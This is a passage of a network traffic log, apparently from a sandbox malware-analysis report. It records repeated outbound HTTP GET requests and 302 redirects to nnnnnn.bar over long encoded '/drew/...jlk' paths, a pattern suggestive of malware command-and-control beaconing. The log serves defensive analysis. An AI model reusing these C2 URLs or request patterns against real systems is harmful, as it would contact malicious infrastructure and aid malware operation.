27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.
Jan 21, 2022 07:54:21.944432020 CET	12368	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:54:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 321 Connection: keep-alive Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 35 66 62 45 31 57 66 67 43 4d 42 62 33 4c 62 6d 32 37 2f 46 72 51 65 48 7a 51 4d 6c 2f 64 53 48 59 33 39 30 47 61 66 4e 66 76 33 44 48 73 4f 78 4e 2f 5f 32 42 52 49 73 46 41 56 57 79 7a 32 57 75 32 5f 32 42 2f 31 36 65 4d 30 62 67 57 55 6d 57 56 30 5f 32 46 54 4b 62 43 46 47 2f 6d 36 78 4c 6b 53 67 4d 34 38 4f 7a 65 2f 4c 5a 4b 63 5f 32 42 4f 2f 4d 79 7a 70 35 7a 39 44 6b 5f 32 46 62 43 53 6e 4d 33 34 58 4a 55 67 2f 6f 67 44 39 43 6f 7a 69 37 43 2f 36 71 79 4c 57 7a 58 6e 47 41 43 74 69 44 50 34 4a 2f 4b 4f 32 57 42 50 4d 4f 43 78 58 74 2f 6f 56 68 4a 41 79 69 37 48 66 43 2f 6c 6c 53 70 36 52 35 43 62 4d 45 56 36 4f 2f 70 57 42 57 6a 76 42 6c 58 5f 32 42 7a 77 6c 49 5f 32 46 4e 65 2f 61 53 46 4e 33 52 37 4c 69 77 52 6f 61 65 6b 50 2f 39 37 73 65 33 72 78 31 65 7a 55 73 69 41 5f 32 42 2f 30 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.
Jan 21, 2022 07:54:27.952430964 CET	12379	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:54:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 321 Connection: keep-alive Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 35 66 62 45 31 57 66 67 43 4d 42 62 33 4c 62 6d 32 37 2f 46 72 51 65 48 7a 51 4d 6c 2f 64 53 48 59 33 39 30 47 61 66 4e 66 76 33 44 48 73 4f 78 4e 2f 5f 32 42 52 49 73 46 41 56 57 79 7a 32 57 75 32 5f 32 42 2f 31 36 65 4d 30 62 67 57 55 6d 57 56 30 5f 32 46 54 4b 62 43 46 47 2f 6d 36 78 4c 6b 53 67 4d 34 38 4f 7a 65 2f 4c 5a 4b 63 5f 32 42 4f 2f 4d 79 7a 70 35 7a 39 44 6b 5f 32 46 62 43 53 6e 4d 33 34 58 4a 55 67 2f 6f 67 44 39 43 6f 7a 69 37 43 2f 36 71 79 4c 57 7a 58 6e 47 41 43 74 69 44 50 34 4a 2f 4b 4f 32 57 42 50 4d 4f 43 78 58 74 2f 6f 56 68 4a 41 79 69 37 48 66 43 2f 6c 6c 53 70 36 52 35 43 62 4d 45 56 36 4f 2f 70 57 42 57 6a 76 42 6c 58 5f 32 42 7a 77 6c 49 5f 32 46 4e 65 2f 61 53 46 4e 33 52 37 4c 69 77 52 6f 61 65 6b 50 2f 39 37 73 65 33 72 78 31 65 7a 55 73 69 41 5f 32 42 2f 30 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:54:21.549371004 CET	12366	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:21.983202934 CET	12369	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:22.516026974 CET	12370	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:23.488868952 CET	12372	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:25.426733017 CET	12376	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:27.364140987 CET	12378	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:29.301879883 CET	12380	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:33.177171946 CET	12381	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:40.927906036 CET	12383	OUT	GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:54:21.575253963 CET	12367	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:22.014446020 CET	12370	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:22.531586885 CET	12371	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:23.488856077 CET	12371	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:25.379602909 CET	12375	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:27.270412922 CET	12376	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:29.161175013 CET	12379	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:32.942723036 CET	12380	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:40.493726969 CET	12383	OUT	GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:54:21.590420008 CET	12367	OUT	GET /drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:24.286071062 CET	12373	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:54:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 326 Connection: keep-alive Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 53 41 73 52 57 57 52 63 67 41 59 62 58 35 4f 2f 73 50 49 55 73 46 46 38 5f 32 46 6e 32 75 4d 78 7a 41 2f 61 53 5f 32 42 31 4d 46 4f 2f 5f 32 42 39 76 74 71 6f 31 4d 32 5f 32 46 48 55 37 35 34 5f 2f 32 46 49 7a 5f 32 46 45 44 42 56 7a 46 52 56 32 79 37 70 2f 69 34 76 33 59 37 38 56 79 5f 32 42 70 5f 32 42 78 64 47 64 62 4d 2f 77 68 75 47 56 31 58 54 6f 78 34 68 63 2f 6a 63 4a 71 56 78 5f 32 2f 46 43 34 68 58 51 79 42 5f 32 46 76 48 72 6c 51 63 45 79 6b 66 62 4a 2f 33 6c 32 36 6c 35 33 68 6a 76 2f 49 42 59 75 47 6b 63 77 31 42 75 59 38 36 44 51 4a 2f 61 79 64 79 74 78 56 61 31 48 61 57 2f 73 77 77 44 62 50 38 37 49 78 4b 2f 78 4e 32 47 79 54 66 58 33 37 6d 35 70 54 2f 43 43 71 69 4c 36 35 39 62 6a 68 34 7a 6d 39 39 74 72 63 43 31 2f 68 34 69 32 74 57 4d 4c 36 54 4b 2f 59 46 55 4c 76 6d 71 74 37 43 50 2f 31 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk'>Found</a>.
Jan 21, 2022 07:54:27.296308994 CET	12377	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:54:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 326 Connection: keep-alive Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 53 41 73 52 57 57 52 63 67 41 59 62 58 35 4f 2f 73 50 49 55 73 46 46 38 5f 32 46 6e 32 75 4d 78 7a 41 2f 61 53 5f 32 42 31 4d 46 4f 2f 5f 32 42 39 76 74 71 6f 31 4d 32 5f 32 46 48 55 37 35 34 5f 2f 32 46 49 7a 5f 32 46 45 44 42 56 7a 46 52 56 32 79 37 70 2f 69 34 76 33 59 37 38 56 79 5f 32 42 70 5f 32 42 78 64 47 64 62 4d 2f 77 68 75 47 56 31 58 54 6f 78 34 68 63 2f 6a 63 4a 71 56 78 5f 32 2f 46 43 34 68 58 51 79 42 5f 32 46 76 48 72 6c 51 63 45 79 6b 66 62 4a 2f 33 6c 32 36 6c 35 33 68 6a 76 2f 49 42 59 75 47 6b 63 77 31 42 75 59 38 36 44 51 4a 2f 61 79 64 79 74 78 56 61 31 48 61 57 2f 73 77 77 44 62 50 38 37 49 78 4b 2f 78 4e 32 47 79 54 66 58 33 37 6d 35 70 54 2f 43 43 71 69 4c 36 35 39 62 6a 68 34 7a 6d 39 39 74 72 63 43 31 2f 68 34 69 32 74 57 4d 4c 36 54 4b 2f 59 46 55 4c 76 6d 71 74 37 43 50 2f 31 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk'>Found</a>.
Jan 21, 2022 07:54:33.312299013 CET	12382	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:54:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 326 Connection: keep-alive Location: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 